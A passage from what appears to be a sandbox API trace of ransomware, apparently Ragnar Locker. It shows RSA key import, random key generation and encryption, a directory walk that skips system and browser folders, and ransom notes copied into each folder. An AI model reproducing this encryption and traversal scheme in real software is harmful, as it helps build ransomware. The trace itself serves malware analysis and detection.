KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0165.392] GetProcessHeap () returned 0x3520000 [0165.392] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x3592ea8 [0165.392] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x3592ea8, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3592ea8, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0165.392] GetProcessHeap () returned 0x3520000 [0165.393] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3592b18 | out: hHeap=0x3520000) returned 1 [0165.393] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x3592ea8, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634 | out: pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634) returned 1 [0165.393] CryptImportPublicKeyInfo (in: hCryptProv=0x3557078, dwCertEncodingType=0x1, pInfo=0x35948f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3594920*, PublicKey.cbData=0x10e, PublicKey.pbData=0x3594928*, PublicKey.cUnusedBits=0x0), phKey=0x357e30c | out: phKey=0x357e30c*=0x3548040) returned 1 [0165.393] GetProcessHeap () returned 0x3520000 [0165.393] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3592ea8 | out: hHeap=0x3520000) returned 1 [0165.393] LocalFree (hMem=0x35948f0) returned 0x0 [0165.393] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x35562a8) returned 1 [0165.397] CryptGenRandom (in: hProv=0x35562a8, dwLen=0x28, pbBuffer=0x3611e2c | out: pbBuffer=0x3611e2c) returned 1 [0165.397] CryptReleaseContext (hProv=0x35562a8, dwFlags=0x0) returned 1 [0165.397] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0165.436] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x35562a8) returned 1 [0165.439] CryptGenRandom (in: hProv=0x35562a8, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0165.439] CryptReleaseContext (hProv=0x35562a8, dwFlags=0x0) returned 1 [0165.439] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0165.534] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x35566e8) returned 1 [0165.538] CryptGenRandom (in: hProv=0x35566e8, dwLen=0x20, pbBuffer=0x3611e54 | out: pbBuffer=0x3611e54) returned 1 [0165.538] CryptReleaseContext (hProv=0x35566e8, dwFlags=0x0) returned 1 [0165.538] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0165.829] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x3556990) returned 1 [0165.834] CryptGenRandom (in: hProv=0x3556990, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0165.834] CryptReleaseContext (hProv=0x3556990, dwFlags=0x0) returned 1 [0165.834] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0165.846] CryptEncrypt (in: hKey=0x3548040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3611e74*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x3611e74*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0165.846] GetLastError () returned 0x80090016 [0165.846] CryptEncrypt (in: hKey=0x3548040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3611f74*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x3611f74*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0165.847] GetLastError () returned 0x80090016 [0165.847] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x3604f08, dwCreationFlags=0x0, lpThreadId=0x5cfdd80 | out: lpThreadId=0x5cfdd80*=0xd44) returned 0x3b4 [0165.848] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3556dd0) returned 1 [0165.852] CryptGenRandom (in: hProv=0x3556dd0, dwLen=0x28, pbBuffer=0x5d3cf84 | out: pbBuffer=0x5d3cf84) returned 1 [0165.852] CryptReleaseContext (hProv=0x3556dd0, dwFlags=0x0) returned 1 [0165.852] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0166.395] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x3556b28) returned 1 [0166.397] CryptGenRandom (in: hProv=0x3556b28, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0166.397] CryptReleaseContext (hProv=0x3556b28, dwFlags=0x0) returned 1 [0166.397] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0166.401] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x3556660) returned 1 [0166.401] CryptGenRandom (in: hProv=0x3556660, dwLen=0x20, pbBuffer=0x5d3cfac | out: pbBuffer=0x5d3cfac) returned 1 [0166.401] CryptReleaseContext (hProv=0x3556660, dwFlags=0x0) returned 1 [0166.401] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0166.404] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x35564c8) returned 1 [0166.405] CryptGenRandom (in: hProv=0x35564c8, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0166.405] CryptReleaseContext (hProv=0x35564c8, dwFlags=0x0) returned 1 [0166.405] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0166.408] CryptEncrypt (in: hKey=0x3548040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3cfcc*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d3cfcc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0166.409] GetLastError () returned 0x80090016 [0166.409] CryptEncrypt (in: hKey=0x3548040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3d0cc*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d3d0cc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0166.410] GetLastError () returned 0x80090016 [0166.410] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d30060, dwCreationFlags=0x0, lpThreadId=0x5cfdd84 | out: lpThreadId=0x5cfdd84*=0xd38) returned 0x3c8 [0166.410] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x35567f8) returned 1 [0166.411] CryptGenRandom (in: hProv=0x35567f8, dwLen=0x28, pbBuffer=0x5d4a0fc | out: pbBuffer=0x5d4a0fc) returned 1 [0166.411] CryptReleaseContext (hProv=0x35567f8, dwFlags=0x0) returned 1 [0166.411] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0166.414] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x35564c8) returned 1 [0166.414] CryptGenRandom (in: hProv=0x35564c8, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0166.414] CryptReleaseContext (hProv=0x35564c8, dwFlags=0x0) returned 1 [0166.415] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0166.417] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x3556bb0) returned 1 [0166.418] CryptGenRandom (in: hProv=0x3556bb0, dwLen=0x20, pbBuffer=0x5d4a124 | out: pbBuffer=0x5d4a124) returned 1 [0166.418] CryptReleaseContext (hProv=0x3556bb0, dwFlags=0x0) returned 1 [0166.418] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0166.420] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x35562a8) returned 1 [0166.421] CryptGenRandom (in: hProv=0x35562a8, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0166.421] CryptReleaseContext (hProv=0x35562a8, dwFlags=0x0) returned 1 [0166.421] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0166.687] CryptEncrypt (in: hKey=0x3548040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d4a144*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d4a144*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0166.687] GetLastError () returned 0x80090016 [0166.687] CryptEncrypt (in: hKey=0x3548040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d4a244*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d4a244*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0166.688] GetLastError () returned 0x80090016 [0166.688] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d3d1d8, dwCreationFlags=0x0, lpThreadId=0x5cfdd88 | out: lpThreadId=0x5cfdd88*=0xa88) returned 0x3d4 [0166.689] WaitForMultipleObjects (nCount=0x3, lpHandles=0x5cfe0d0*=0x3b4, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0167.400] GetProcessHeap () returned 0x3520000 [0167.400] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x357e308 | out: hHeap=0x3520000) returned 1 [0167.400] CloseHandle (hObject=0x3b4) returned 1 [0167.400] GetProcessHeap () returned 0x3520000 [0167.400] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3604f08 | out: hHeap=0x3520000) returned 1 [0167.404] CloseHandle (hObject=0x3c8) returned 1 [0167.404] GetProcessHeap () returned 0x3520000 [0167.404] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d30060 | out: hHeap=0x3520000) returned 1 [0167.404] CloseHandle (hObject=0x3d4) returned 1 [0167.404] GetProcessHeap () returned 0x3520000 [0167.404] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d3d1d8 | out: hHeap=0x3520000) returned 1 [0167.406] FindClose (in: hFindFile=0x3547c40 | out: hFindFile=0x3547c40) returned 1 [0167.408] FindNextFileW (in: hFindFile=0x3548140, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0167.408] lstrcmpiW (lpString1="SafeOS", lpString2=".") returned 1 [0167.408] lstrcmpiW (lpString1="SafeOS", lpString2="..") returned 1 [0167.408] lstrcmpiW (lpString1="SafeOS", lpString2="Windows") returned -1 [0167.408] lstrcmpiW (lpString1="SafeOS", lpString2="Windows.old") returned -1 [0167.408] lstrcmpiW (lpString1="SafeOS", lpString2="Tor browser") returned -1 [0167.408] lstrcmpiW (lpString1="SafeOS", lpString2="Internet Explorer") returned 1 [0167.408] lstrcmpiW (lpString1="SafeOS", lpString2="Google") returned 1 [0167.408] lstrcmpiW (lpString1="SafeOS", lpString2="Opera") returned 1 [0167.408] lstrcmpiW (lpString1="SafeOS", lpString2="Opera Software") returned 1 [0167.408] lstrcmpiW (lpString1="SafeOS", lpString2="Mozilla") returned 1 [0167.408] lstrcmpiW (lpString1="SafeOS", lpString2="Mozilla Firefox") returned 1 [0167.409] lstrcmpiW (lpString1="SafeOS", lpString2="$Recycle.Bin") returned 1 [0167.409] lstrcmpiW (lpString1="SafeOS", lpString2="ProgramData") returned 1 [0167.409] lstrcmpiW (lpString1="SafeOS", lpString2="All Users") returned 1 [0167.409] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\$GetCurrent\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x16 [0167.409] lstrcpyW (in: lpString1=0x5cfe9aa, lpString2="SafeOS" | out: lpString1="SafeOS") returned="SafeOS" [0167.409] lstrcatW (in: lpString1="\\\\?\\C:\\$GetCurrent\\SafeOS", lpString2="\\" | out: lpString1="\\\\?\\C:\\$GetCurrent\\SafeOS\\") returned="\\\\?\\C:\\$GetCurrent\\SafeOS\\" [0167.409] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\$GetCurrent\\SafeOS\\" | out: lpString1="\\\\?\\C:\\$GetCurrent\\SafeOS\\") returned="\\\\?\\C:\\$GetCurrent\\SafeOS\\" [0167.409] lstrcatW (in: lpString1="\\\\?\\C:\\$GetCurrent\\SafeOS\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\$GetCurrent\\SafeOS\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\$GetCurrent\\SafeOS\\!$R4GN4R_B8CF767A$!.txt" [0167.409] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\$getcurrent\\safeos\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0167.415] lstrcatW (in: lpString1="\\\\?\\C:\\$GetCurrent\\SafeOS\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\$GetCurrent\\SafeOS\\*.*") returned="\\\\?\\C:\\$GetCurrent\\SafeOS\\*.*" [0167.415] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\$GetCurrent\\SafeOS\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x1d [0167.415] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0167.415] lstrcpyW (in: lpString1=0x5cfd898, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0167.415] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3548240 [0167.415] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0167.415] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0xf120bc19, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.418] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0167.418] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0167.418] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf120bc19, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf120bc19, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0167.419] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0167.419] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0167.419] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9568f13f, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9568f13f, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentOOBE.dll", cAlternateFileName="")) returned 1 [0167.419] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2=".") returned 1 [0167.419] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="..") returned 1 [0167.419] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956819aa, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x956819aa, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentRollback.ini", cAlternateFileName="")) returned 1 [0167.419] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2=".") returned 1 [0167.419] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="..") returned 1 [0167.419] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupComplete.cmd", cAlternateFileName="")) returned 1 [0167.419] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2=".") returned 1 [0167.419] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="..") returned 1 [0167.419] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9575af11, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9577d1ec, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="preoobe.cmd", cAlternateFileName="")) returned 1 [0167.419] lstrcmpiW (lpString1="preoobe.cmd", lpString2=".") returned 1 [0167.419] lstrcmpiW (lpString1="preoobe.cmd", lpString2="..") returned 1 [0167.419] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="")) returned 1 [0167.419] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2=".") returned 1 [0167.419] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="..") returned 1 [0167.419] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="")) returned 0 [0167.420] FindClose (in: hFindFile=0x3548240 | out: hFindFile=0x3548240) returned 1 [0167.420] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547f00 [0167.420] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0xf120bc19, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf120bc19, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.420] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf120bc19, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf120bc19, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0167.420] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\$GetCurrent\\SafeOS\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x1d [0167.420] lstrcpyW (in: lpString1=0x5cfdaa0, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0167.420] PathFindExtensionW (pszPath="\\\\?\\C:\\$GetCurrent\\SafeOS\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0167.420] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0167.420] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9568f13f, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9568f13f, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentOOBE.dll", cAlternateFileName="")) returned 1 [0167.421] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\$GetCurrent\\SafeOS\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x1d [0167.421] lstrcpyW (in: lpString1=0x5cfdaa0, lpString2="GetCurrentOOBE.dll" | out: lpString1="GetCurrentOOBE.dll") returned="GetCurrentOOBE.dll" [0167.421] PathFindExtensionW (pszPath="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned=".dll" [0167.421] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0167.421] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="autorun.inf") returned 1 [0167.421] lstrcmpiW 